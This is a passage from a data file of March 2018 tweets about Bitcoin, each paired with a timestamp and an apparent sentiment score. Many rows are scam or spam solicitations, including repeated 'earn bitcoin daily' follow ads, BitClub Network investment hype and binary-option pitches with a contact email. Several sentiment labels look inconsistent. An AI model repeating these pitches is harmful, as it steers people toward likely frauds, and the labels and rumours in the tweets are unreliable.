pinned tweet",1.0 +Fri Mar 23 07:00:52 +0000 2018,"#Bitcoin $8,381.78 v #BitcoinCash $965.99 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 16:00JST",0.0 +Fri Mar 23 07:00:55 +0000 2018,Current price of Bitcoin is $8376.47 #bitcoin,0.0 +Fri Mar 23 07:00:56 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:11 +0000 2018,"The current price of Bitcoin is $8476.41. +The current price of BCash is $974.314, or 0.115429 BTC",0.0 +Fri Mar 23 07:01:12 +0000 2018,Change publishing forever Accept #bitcoin payments ask thehumanfaucet to get started #askastoreaday,0.0 +Fri Mar 23 07:01:19 +0000 2018,Current price of Bitcoin is $8376.47 via @Chain #bitcoin #finance,0.0 +Fri Mar 23 07:01:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:01:24 +0000 2018,Current #Bitcoin price: $8376.47,0.0 +Fri Mar 23 07:01:24 +0000 2018,Current price of Bitcoin is $8376.47 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 07:01:26 +0000 2018,"I earn R36000 a month +Inbox for a relationship. +#TrapaDrive +#SaWasABetterPlaceBefore +#bitcoin",0.0 +Fri Mar 23 07:01:28 +0000 2018,Current price of Bitcoin is $8376.47,0.0 +Fri Mar 23 07:01:29 +0000 2018,"ToysRus Everyday you miss not accepting #bitcoin ,is money lost, can you afford another year like this? thehumanfaucet will get you started",-1.0 +Fri Mar 23 07:01:32 +0000 2018,Current price of Bitcoin is $8376.47.,0.0 +Fri Mar 23 07:01:34 +0000 2018,Bitcoin 8376.47 $,0.0 +Fri Mar 23 07:01:39 +0000 2018,"The current price of Bitcoin is $8476.41. +The current price of BCash is $974.314, or 0.115429 BTC",0.0 +Fri Mar 23 07:01:42 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:52 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:52 +0000 2018,"CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars #cryptonews #crypto #altcoins",-1.0 +Fri Mar 23 07:01:54 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:56 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:02:22 +0000 2018,Current price of Bitcoin is $8376.47 #Bitcoin #Finance #Entrepreneur,0.0 +Fri Mar 23 07:02:23 +0000 2018,Current price of Bitcoin is $8376.47 $BTC You down?,-1.0 +Fri Mar 23 07:02:25 +0000 2018,#FYI Current price of #Bitcoin is $8376.47,0.0 +Fri Mar 23 07:02:34 +0000 2018,Cryptobot reporting that 1 Bitcoin is now 8376.47 USD! #bitcoin #cryptocurrency,0.0 +Fri Mar 23 07:02:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:02:47 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!! +[Virtual currency mining Encryption currency]",1.0 +Fri Mar 23 07:02:47 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK! !",1.0 +Fri Mar 23 07:03:14 +0000 2018,Current price of Bitcoin is $8376.47,0.0 +Fri Mar 23 07:03:15 +0000 2018,Current price of Bitcoin is $8376.47 via @BTCpx #BTC $BTC,0.0 +Fri Mar 23 07:03:16 +0000 2018,Current price of #Bitcoin $btc is $8376.47,0.0 +Fri Mar 23 07:03:24 +0000 2018,Current price of #Bitcoin is $8376.47,0.0 +Fri Mar 23 07:03:26 +0000 2018,Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token,-1.0 +Fri Mar 23 07:03:32 +0000 2018,Current price of #Bitcoin is $8376.47,0.0 +Fri Mar 23 07:03:32 +0000 2018,#Bitcoin Price 8376.47 USD via Chain,0.0 +Fri Mar 23 07:04:18 +0000 2018,"@RampCapitalLLC if #Bitcoin isn’t $10Trillion by next week, I will eat my breakfast live on Facebook.",1.0 +Fri Mar 23 07:04:20 +0000 2018,Current price of Bitcoin is $8376.47,0.0 +Fri Mar 23 07:04:20 +0000 2018,Current price of Bitcoin is $8718.74 via Chain,0.0 +Fri Mar 23 07:04:25 +0000 2018,@alextohme Well @jack thinks the whole world will be on some form of global bitcoin in 10years - so all the $$ mean nothing 😂😂,-1.0 +Fri Mar 23 07:04:29 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:04:34 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:04:43 +0000 2018,Good morning! The current price of Bitcoin is $8376.47.,1.0 +Fri Mar 23 07:04:49 +0000 2018,@Malowbar Bitcoin,0.0 +Fri Mar 23 07:06:04 +0000 2018,@Bitcoin What? Lol,1.0 +Fri Mar 23 07:06:35 +0000 2018,Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token #ROX #Robotinaico,-1.0 +Fri Mar 23 07:06:39 +0000 2018,Current price of Bitcoin is $9026.40 @Chain,0.0 +Fri Mar 23 07:06:40 +0000 2018,Current price of Bitcoin is $8610.90 @Chain,0.0 +Fri Mar 23 07:07:05 +0000 2018,"DataBroker DAO is the first marketplace to trade sensor data +#internetofthings #bitcoin",1.0 +Fri Mar 23 07:07:06 +0000 2018,"@ElongWilliam @barichnel We have many children of bitcoin like litecoin, coinbase. +Pm me for more information about it",1.0 +Fri Mar 23 07:07:38 +0000 2018,Current price of Bitcoin is $8376.47 #Bitcoin #Bithound,0.0 +Fri Mar 23 07:07:45 +0000 2018,@realDonaldTrump It's time to buy Bitcoin,0.0 +Fri Mar 23 07:07:46 +0000 2018,$ZECUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 07:07:55 +0000 2018,"Sets your bar high, even if you fail. #Crypto #Bitcoin #Ethereum #Neo #ETN #Litecoin #JACKMATE",-1.0 +Fri Mar 23 07:08:06 +0000 2018,@officialmcafee @theemrsmcafee Your ding dong is safe. #Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL,1.0 +Fri Mar 23 07:08:30 +0000 2018,$BTCUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 07:09:17 +0000 2018,BTC $8415.39 Down -$21.75 -0.26% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 07:09:19 +0000 2018,@CryptoCountant Come on Bitcoin do your thing so i can buy some cheap WAN,1.0 +Fri Mar 23 07:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.422,220 +1 Hour: -0.32 % | 24 Hours: -6.66 % | 7 Days: 2.84 % +#btc #bitcoin",0.0 +Fri Mar 23 07:10:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:10:04 +0000 2018,"1 bitcoin = $8449.41 / 6850.198€ +1 bitcoin-cash = $970.175 / 786.55€ +1 ethereum = $517.205 / 419.314€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:10:35 +0000 2018,"The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #bitcoinworld",1.0 +Fri Mar 23 07:10:42 +0000 2018,"Kept my head down for couple weeks. Whats the news in crypto.........same as everyday, sweet. #crypto #bitcoin",-1.0 +Fri Mar 23 07:11:21 +0000 2018,:( :( ....[Bitcoin performance assessment (-0.58%)] #bitcoin,-1.0 +Fri Mar 23 07:11:30 +0000 2018,Bitcoin value: $8427.19,0.0 +Fri Mar 23 07:12:08 +0000 2018,bitcoin,0.0 +Fri Mar 23 07:12:14 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:14:26 +0000 2018,"🌈 Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.37B USD +#bitcoin #cryptopaymon 🤖",0.0 +Fri Mar 23 07:14:27 +0000 2018,@enekoknorr Fortunately (for them) most of it on Bitcoin.,1.0 +Fri Mar 23 07:14:52 +0000 2018,"Current Bitcoin Price = $9428.13 --- Includes Sum of Forks, Core $8406.00 (89.16%) + Cash $964.97 (10.23%) + Gold $57.16 (0.61%)",0.0 +Fri Mar 23 07:14:59 +0000 2018,@TheCryptoDog Never heard of them. Is that like the bitcoin?,0.0 +Fri Mar 23 07:15:02 +0000 2018,"The current price of Bitcoin is $8449.41. +The current price of BCash is $970.175, or 0.115625 BTC",0.0 +Fri Mar 23 07:16:04 +0000 2018,"Use your browser to passively mine bitcoin and receive mining rewards instantly to your account, credited every hour.start is→http://freebit",0.0 +Fri Mar 23 07:16:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$973,353 +1 Hour: 0.04 % | 24 Hours: -7.08 % | 7 Days: 5.85 % +#bch #bitcoin cash",0.0 +Fri Mar 23 07:17:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:17:43 +0000 2018,"Fri Mar 23 08:17:22 2018 (69:54) +USD : 8416.92 +Wght: 0.42 +Blk#: 514767 +Size: 1050.1 KB +TXs: 2151 +Pool: 6729 (4.3 MB) +#bitcoin",0.0 +Fri Mar 23 07:18:30 +0000 2018,@zebpay TCC is Next Bitcoin,0.0 +Fri Mar 23 07:18:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:18:38 +0000 2018,@officialmcafee @theemrsmcafee JAPAN FUD = BITCOIN CRASH. Every FUD = crash. Bubble has burst.,0.0 +Fri Mar 23 07:18:40 +0000 2018,New #bitcoin block 00000000000000000046e410eb1454e5ba5c83eb5df6253414a3127e02e3ed9a mined at height 514767.,1.0 +Fri Mar 23 07:19:01 +0000 2018,NEO is now £45.88. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 07:19:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:19:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:20:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:20:03 +0000 2018,"1 bitcoin = $8440.96 / 6843.347€ +1 bitcoin-cash = $973.353 / 789.127€ +1 ethereum = $517.037 / 419.177€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:21:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:22:50 +0000 2018,@ssohanurrahman2 what price did you first get into Bitcoin at?,1.0 +Fri Mar 23 07:23:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:24:00 +0000 2018,Pls I wanna go into bitcoin business. Anyone with advice please help I don't wanna lose my cash.,0.0 +Fri Mar 23 07:24:30 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:24:59 +0000 2018,Join the comunnity #bitcoin #cryptocurrency #alts #ALTSEASON #Blockchain #Forum #Airdrops #BountyProgram,0.0 +Fri Mar 23 07:25:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:25:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:25:12 +0000 2018,"@RealJamesWoods @dtannie Forgot to say, thanks, Woods. #bitcoin BoycottCosco",1.0 +Fri Mar 23 07:25:14 +0000 2018,"Fri Mar 23 08:25:11 2018 (7:49) +USD : 8398.21 +Wght: 0.42 +Blk#: 514768 +Size: 1125.3 KB +TXs: 2223 +Pool: 5350 (3.7 MB) +#bitcoin",0.0 +Fri Mar 23 07:25:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:25:53 +0000 2018,New #bitcoin block 000000000000000000303b4f6effdf147d5954ca6a640d7b78bf09a99b57f36b mined at height 514768.,1.0 +Fri Mar 23 07:26:01 +0000 2018,"@Bitcoin Doesn‘t look very centralized to me, tbh",1.0 +Fri Mar 23 07:26:21 +0000 2018,:( :( ....[Bitcoin performance assessment (-0.24%)] #bitcoin,-1.0 +Fri Mar 23 07:27:49 +0000 2018,"@Dark_Realist @LuminousNebulae @hellosugoi @bitcoinmom @La__Cuen I love, love, love my Bitcoin family. ⚘⚘⚘",1.0 +Fri Mar 23 07:28:04 +0000 2018,"@Bitfinexed Even DMM in Japan is dealing with Bitcoin now, why gave the profits and advantages to the shity Chinese Tether exchange?",0.0 +Fri Mar 23 07:28:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:29:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:30:02 +0000 2018,"BTC-SEQ AskRate: 0.00002180 #Bittrex #SEQ $SEQ #Sequence #altcoin #altcoins #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 07:30:02 +0000 2018,"Bitcoin:$8437.33 +Ethereum:$515.595 +Bitcoin Cash:$971.782 +Litecoin:$158.2 +Ripple:$0.632992 +IOTA:$1.25814",0.0 +Fri Mar 23 07:30:03 +0000 2018,"1 bitcoin = $8437.33 / 6840.404€ +1 bitcoin-cash = $969.847 / 786.285€ +1 ethereum = $514.437 / 417.07€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:30:04 +0000 2018,One Bitcoin now worth $8407.38@bitstamp. High $9025.000. Low $8342.000. Market Cap $142.372 Billion #bitcoin,1.0 +Fri Mar 23 07:30:27 +0000 2018,#XEM Price is 0.00003286 (-0.00000012) #BTC / 0.27662 (+0.00012) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:28 +0000 2018,#SUB Price is 0.00004490 (+0.00000046) #BTC / 0.377967 (+0.00537) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:29 +0000 2018,#ADA Price is 0.00002263 (+0.00000004) #BTC / 0.189696 (+0.00029) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:31 +0000 2018,#EOS Price is 0.00077847 (+0.00000173) #BTC / 6.52517 (+0.01313) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:31 +0000 2018,#DASH Price is 0.0475073 (+0.00000950) #BTC / 398.208 (-0.00400) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:38 +0000 2018,@joshkettle1 He’ll be a bust #bitcoin,0.0 +Fri Mar 23 07:30:48 +0000 2018,Sooner or later people are gonna realise that compared to bitcoin most alts are just zimbabwe dollars. I think.,1.0 +Fri Mar 23 07:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8434.47 as of Fri Mar 23 02:31:09 CDT 2018",0.0 +Fri Mar 23 07:31:31 +0000 2018,Bitcoin value: $8405.7,0.0 +Fri Mar 23 07:31:33 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 07:31:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:32:02 +0000 2018,@rogerkver @Falkvinge Bitcoin Cash is zimbabwe dollars compared to bitcoin.,0.0 +Fri Mar 23 07:32:37 +0000 2018,"@Cyrii_Lightning maybe not bitcoin but thats a cool concept for sure +like an economy death note type deal",1.0 +Fri Mar 23 07:32:43 +0000 2018,"9/10🌍 +If you personalize losses, you can't trade + +$btc $alts #bitcoin #cryptocurrency #investing #trading",0.0 +Fri Mar 23 07:32:44 +0000 2018,so wassup with these bitcoin ATM's? 🤔,0.0 +Fri Mar 23 07:33:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:33:39 +0000 2018,Bitcoin hasn't went up or down $100 in the past five hours...boring,-1.0 +Fri Mar 23 07:33:59 +0000 2018,@zebpay TCC (The Champ Coin) first and best Indian crypto currency who became next bitcoin,1.0 +Fri Mar 23 07:34:14 +0000 2018,@CNBC Bitcoin is only theoretically pure. It can easily (and is) be controlled by single entities,1.0 +Fri Mar 23 07:34:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:35:17 +0000 2018,for all the flaws in sex at least it will never be the next bitcoin,-1.0 +Fri Mar 23 07:35:17 +0000 2018,"Short term Bitcoin is going down, wait for a big dip to buy",-1.0 +Fri Mar 23 07:35:19 +0000 2018,I just won free 20 satoshi from WeLoveBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 07:35:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:35:39 +0000 2018,"@Capn_Flint For a second i thought its the bitcoin bubble finally bursting. Now Im sad. +BUT DAMN! Congrats!",-1.0 +Fri Mar 23 07:36:03 +0000 2018,@abigail10t8imo3 if you are interested in trading binary option trade and bitcoin mining message me for more info fs302399@gmail.com,1.0 +Fri Mar 23 07:36:14 +0000 2018,I LOVE Bitcoin,1.0 +Fri Mar 23 07:36:17 +0000 2018,"SKYF chain it is bounty program very potential +#skyfchain +#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",0.0 +Fri Mar 23 07:36:18 +0000 2018,Hey dude fuck you and your bitcoin investment opportunity. Acting like I ain’t ever heard of coinbase or others,-1.0 +Fri Mar 23 07:36:55 +0000 2018,@arthwollipot I didn't know you were doing Bitcoin.,0.0 +Fri Mar 23 07:38:15 +0000 2018,@zebpay TCC (THE CHAMPCOIN) HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY,0.0 +Fri Mar 23 07:38:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:38:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:38:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:38:56 +0000 2018,"Well, I think different, for me Bitcoin Core is #BitcoinCore. #BitcoinCash is #bitcoin and #cash! @Egon_01",0.0 +Fri Mar 23 07:39:33 +0000 2018,"BTC,ETH,ETC,LTC,BCH,MONA +Please please give me a little earlier Christmas present ...  +#Bitcoin #VirtualCurrency",-1.0 +Fri Mar 23 07:40:03 +0000 2018,"1 bitcoin = $8426.81 / 6831.876€ +1 bitcoin-cash = $969.099 / 785.678€ +1 ethereum = $513.803 / 416.556€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:40:26 +0000 2018,Remember when bitcoin was a safe haven asset?,1.0 +Fri Mar 23 07:40:33 +0000 2018,"""There are 3 eras of currency: commodity based, politically based, and now, math based."" - Chris Dixon #bitcoin #quote",0.0 +Fri Mar 23 07:40:54 +0000 2018,@CryptoYoda1338 DOW crash = Bitcoin crash IMO,0.0 +Fri Mar 23 07:40:59 +0000 2018,@ALLinPav This is good for bitcoin!,1.0 +Fri Mar 23 07:41:15 +0000 2018,"I am experimenting whether I can live only with bit coins donated. Please cooperate. + +12BZeZHNnuy9bVNxqNjNcFi3T91bxLVep ##bitcoin #Donation",1.0 +Fri Mar 23 07:41:28 +0000 2018,"Optimal tx fee: 5 satoshi per byte. +BTC : $8423 / €6823 / £5966 @ Block 514768. +Market Cap: 143.29B USD. #Bitcoin #Fintech",0.0 +Fri Mar 23 07:41:29 +0000 2018,"B stands for Bear Run +B stands for Bitcoin +B also stands for Block!!🚫❌ don’t be afraid to use this amazing functionality on social media.",1.0 +Fri Mar 23 07:41:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:41:39 +0000 2018,"@APompliano @iamjosephyoung if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:42:11 +0000 2018,"@ErikVoorhees if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:42:28 +0000 2018,@BithumbOfficial Skycoin is Next Bitcoin!Lol,0.0 +Fri Mar 23 07:43:20 +0000 2018,@CryptoNikita What are you buying these days Nikita? U should consider some bitcoin private .,0.0 +Fri Mar 23 07:43:35 +0000 2018,"@trmakgatho if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:44:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:44:13 +0000 2018,"Bye bye bull. +Buy position in another few hundred #bitcoin",-1.0 +Fri Mar 23 07:44:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:45:19 +0000 2018,#Bitcoin slumps after Japan's FSA warns #Binance for operating without a license. -4.5% so far.,1.0 +Fri Mar 23 07:45:26 +0000 2018,haha diet bitcoin what in the fuck,-1.0 +Fri Mar 23 07:45:34 +0000 2018,"bitcoin donation adress is: + +1NVNeGryRdNycGEqDv8KqFwUHNpadScU3q + +We do not have to eat + +#donation",0.0 +Fri Mar 23 07:45:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:45:57 +0000 2018,I just giggle like a kid when I️ check my bitcoin account 🤑🤑🤑,0.0 +Fri Mar 23 07:46:05 +0000 2018,"@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!",0.0 +Fri Mar 23 07:46:05 +0000 2018,"@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!",0.0 +Fri Mar 23 07:46:14 +0000 2018,@XRPTrump @TwitterSupport Sadly Tweetters CEO is only supporting bitcoin. The xrp community no longer have a voice in this,-1.0 +Fri Mar 23 07:46:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:46:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:46:35 +0000 2018,"@bitcoingold we trust bitcoin gold more than bch , +in future price be higher its civil coin ! +but bch is monopoly bitmain monster.",1.0 +Fri Mar 23 07:46:38 +0000 2018,MEH WANT BITCOIN!!,0.0 +Fri Mar 23 07:47:02 +0000 2018,"@ChrisMaroleng if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:47:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:47:27 +0000 2018,"Bitcoin eliminates the need for banks, gets rid of credit card fees, currency exchange fees and money transfer fees #bitcoin #bitcoinminer",0.0 +Fri Mar 23 07:47:41 +0000 2018,"Lols,this generation won't kill me! Which one is ""o sha prapra olosho to n gba bitcoin""? 😁😁😁",0.0 +Fri Mar 23 07:47:51 +0000 2018,"@Simply_Msizi if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:48:23 +0000 2018,Bitcoin's movies discussion makes it a front-runner to these corporations,0.0 +Fri Mar 23 07:48:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:48:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:48:46 +0000 2018,@reaposhi wht was interesting to me is that ceo of bitcoin dot com was actively saying that they were supporting bitcoin cash.,1.0 +Fri Mar 23 07:49:16 +0000 2018,More and more #hosting companies start accepting #bitcoin and other #cryptocurrencies. Just an observation.,1.0 +Fri Mar 23 07:49:27 +0000 2018,@Cointelegraph Bitcoin bubble crashing really hard,-1.0 +Fri Mar 23 07:50:04 +0000 2018,"1 bitcoin = $8435.77 / 6839.14€ +1 bitcoin-cash = $972.047 / 788.068€ +1 ethereum = $515.26 / 417.737€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:50:20 +0000 2018,"@mbali_ndlela if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:50:46 +0000 2018,Wake the F*CK up people! If you don't own #crypto by mid-2018 then you are going to miss out 'THE CHANCE' of your life. #Bitcoin,1.0 +Fri Mar 23 07:51:10 +0000 2018,"Calm before the storm... + +#bitcoin #crypto",1.0 +Fri Mar 23 07:51:31 +0000 2018,Bitcoin value: $8419.63,0.0 +Fri Mar 23 07:51:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:52:10 +0000 2018,@PhilakoneCrypto Bitcoin might be illegal as they found child porn links embed in the blockchain. Maybe reason why we have panic sellout,-1.0 +Fri Mar 23 07:53:34 +0000 2018,@yishi888 Wish I could buy more OCN but my money is stuck in SAY 😩😩😩 praying Kucoin gives us bitcoin for the SAY so I can buy more OCN!!!,1.0 +Fri Mar 23 07:53:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:53:56 +0000 2018,@rogerkver @Falkvinge But in saying that I think Bitcoin Cash touches most ppl in a bad place...,-1.0 +Fri Mar 23 07:53:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:54:07 +0000 2018,@sabotagebeats Yeah. But bitcoin dot com has nothing to do with bitcoin. It’s a propaganda site for bcash runned by the btrash scam team.,-1.0 +Fri Mar 23 07:54:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:55:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:55:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:55:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:56:00 +0000 2018,what the online social media website named Twitter™ about bitcoin can i just buy some ethereum on coinbase,1.0 +Fri Mar 23 07:56:22 +0000 2018,PEOPLE LOOK INTO A CRYPTOCURRENCY CALLED WANCHAIN ( WAN) ALL IM SAYING IT WILL BE BIGGER THAN BITCOIN !! check it out do your own dd,1.0 +Fri Mar 23 07:56:30 +0000 2018,"@caldwellsiegel1 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:56:57 +0000 2018,@whatbitcoindid Don't transfer more Bitcoin than you are willing to lose to your bitmex account.,1.0 +Fri Mar 23 07:56:58 +0000 2018,"@Joseph66352787 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:57:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:57:31 +0000 2018,"@thelastdon430 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:57:47 +0000 2018,@oggasbagss If you can find a bitcoin ATM you can get the wired transfer,0.0 +Fri Mar 23 07:57:58 +0000 2018,"@Bwreckless if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:58:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:58:23 +0000 2018,"@A1hurns if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:58:33 +0000 2018,Instant liquidity through the API from the relevant #Minerva trading exchanges. #ICO #Ethereum #Blockchain #Bitcoin #Crypto,1.0 +Fri Mar 23 07:58:39 +0000 2018,"Backed by neither a government nor a bank, bitcoin has attracted currency speculators in recent months.",0.0 +Fri Mar 23 07:58:55 +0000 